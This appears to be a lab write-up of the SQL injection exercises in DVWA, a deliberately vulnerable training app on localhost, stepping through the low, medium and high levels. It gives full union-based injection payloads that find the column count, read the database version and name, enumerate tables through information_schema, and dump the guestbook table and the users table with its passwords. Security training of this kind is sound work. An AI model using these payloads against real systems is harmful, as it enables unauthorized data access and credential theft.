Article directory
DVWA-SQLi clearance
Primary: Obtaining the database version number
Determine the type of injection
Try single quotes and double quotes in turn, and find that single quotes will cause an error, but double quotes will not report an error, so it is a string type using single quotes
in conclusion:
In character injection, which symbol causes an error, it represents the character injection of which symbol
order by number of inferred fields
http://localhost/dv/vulnerabilities/sqli/?id=2' order by 2--+ &Submit=Submit#
Joint injection query database version number
http://localhost/dv/vulnerabilities/sqli/?id=2' and 1=2 union select version(),2--+ &Submit=Submit#
Intermediate: Get the database name
Judging the echo status:
Found to have an echo.
Determine the type of injection: try quotes
Turns out our quotes were escaped
order by calculates the number of fields
Assuming it is a numeric type, and because it has echo, try to use order by to calculate the field
When it reaches 3, an error will be reported, so you can know that the number of fields is 2
Get data echo location
post请求(如图):
Submit=Submit&id=2 and 1=2 union select 1,2
joint query
The database name can be obtained through union joint query
post请求(如图):
Submit=Submit&id=2 and 1=2 union select 1,database()
source code audit
Since the mysqli_real_escape_string() function is used in the source code to escape the data we input, character injection cannot be used. However, the statement in the source code is not a character injection, but a numeric injection, and because the page echoes, So you can use joint injection to get the database name
Advanced: Get Any Content
The advanced level is actually similar to the intermediate level, both of which use joint injection. The difference is that the advanced level needs to be closed with single quotes, and this level does not have the mysqli_real_escape_string() function to escape the content we input
Judgment echo
By entering different ids, it is found that different results are displayed on the page, confirm that there is an echo
Determine the type of injection
By trying single quotes and double quotes, it is found that single quotes report an error, so the injection type is a string type of single quotes
The number of fields calculated by order by is 2
http://localhost/dv/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
Determine the echo position
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select 1,2--+&Submit=Submit#
So you can get arbitrary content through joint injection
get database version
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select database(),version()--+&Submit=Submit#
Database: dvwa
Version: 5.5.53
Get the tables in the database
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()--+&Submit=Submit#
表:guestbook,users
Get the fields of the guestbook table
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name="guestbook"--+&Submit=Submit#
Fields of the guestbook table: comment_id, comment, name
Get all the data of the guestbook table
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select CONCAT(comment_id,'--',comment,'--',name),2 from dvwa.guestbook --+&Submit=Submit#
data:
1--This is a test comment.--test
Get the fields of the users table
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name="users"--+&Submit=Submit#
users表的字段:user_id,first_name,last_name,user,password,avatar,last_login,failed_login
Get all the data in the users table
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select CONCAT(user_id,'--',first_name,'--',last_name,'--',user,'--',password,'--',avatar,'--',last_login,'--',failed_login),2 from dvwa.users --+&Submit=Submit#